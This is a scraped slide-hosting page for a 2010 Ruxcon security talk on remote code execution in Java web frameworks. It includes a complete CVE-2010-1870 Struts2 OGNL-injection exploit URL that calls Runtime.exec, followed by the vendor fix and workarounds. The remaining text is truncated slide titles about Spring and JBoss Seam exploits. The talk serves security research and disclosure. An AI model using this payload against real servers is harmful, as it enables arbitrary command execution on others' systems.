view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

More documents

Recommendations

Info

CVE-2010-1870 exploit/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023rt\u003d@java.lang.Runtime@getRuntime())(\u0023rt.exec('mkdir\u0020/tmp/PWNED'\u002cnull)))=1Thursday, November 25, 2010
CVE-2010-1870 fix2.2.1 fixes vulnerability (~3 months)Work around is either:whitelist A-z0-9_[].’use “params” interceptor’s excludeParams parameterto blacklist:\u ( )Thursday, November 25, 2010
Page 1 and 2: Milking a horseorexecuting remote c
Page 3 and 4: kumys is a fermented dairy productt
Page 5 and 6: Thursday, November 25, 2010...back
Page 7 and 8: Plain old servletpublic class MySer
Page 9 and 10: Problemsa lot of verbose boilerplat
Page 11 and 12: user code complexityframework code
Page 13 and 14: How secure are these Java framework
Page 15 and 16: ApproachUse IDE (e.g. IntelliJ IDEA
Page 17 and 18: Look at how frameworkimplements its
Page 19 and 20: Nifty featuresRich taglibrary (e.g.
Page 21 and 22: Nifty featuresuser.address.city = B
Page 23 and 24: HTTP parameters == OGNL statementsW
Page 25 and 26: CVE-2010-1870Based on my previous b
Page 27 and 28: XW-641('\u0023' + 'session[\'user\'
Page 29 and 30: XW-641('\u0023' + 'session[\'user\'
Page 31 and 32: CVE-2010-1870There are actually mor
Page 33 and 34: CVE-2010-1870#context[‘xwork.Meth
Page 35 and 36: CVE-2010-1870 exploit#_memberAccess
Page 37 and 38: CVE-2010-1870 exploit#_memberAccess
Page 39: CVE-2010-1870 exploit#_memberAccess
Page 43 and 44: SpringSpring MVC is Spring’s web
Page 45 and 46: BeanInfo getBeanInfo(Class beanClas
Page 47 and 48: Introspector.getBeanInfo(Person);fi
Page 49 and 50: Introspector.getBeanInfo(Person);fi
Page 51 and 52: CVE-2010-1622Two problems:How do we
Page 53 and 54: InputTag.tagThursday, November 25,
Page 55 and 56: CVE-2010-1622 exploitDownload org.s
Page 57 and 58: Thursday, November 25, 2010JBoss Se
Page 59 and 60: JBoss SeamCombines EJB3 with JSFPOJ
Page 61 and 62: CVE-2010-1871Special HTTP parameter
Page 63 and 64: CVE-2010-1871Special HTTP parameter
Page 65 and 66: CVE-2010-1871 exploitHow to execute
Page 67 and 68: CVE-2010-1871 exploitview.getClass.
Page 69 and 70: CVE-2010-1871 exploitview.getClass.
Page 71 and 72: CVE-2010-1871 exploitTo call java.l
Page 73 and 74: How do we get method’s index?/sea
Page 75 and 76: CVE-2010-1871 exploitMethod for Run
Page 77 and 78: CVE-2010-1871 exploit/seam-booking/
Page 79 and 80: Thursday, November 25, 2010
Page 81 and 82: Thursday, November 25, 2010
Page 83 and 84: What’s Java security manager?Sing
Page 85 and 86: Thursday, November 25, 2010Are you
Page 87 and 88: Why is nobody’s using it?Thursday
Page 89 and 90: Problems (cont.)Support for privile
Page 91 and 92:
How do we solve these?*Thursday, No
Page 93 and 94:
ProsWill address some of the perfor
Page 95 and 96:
Where’s the code?Alpha version wi
Page 97 and 98:
Thursday, November 25, 2010
show all

view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

Create successful ePaper yourself

Delete template?

Save as template?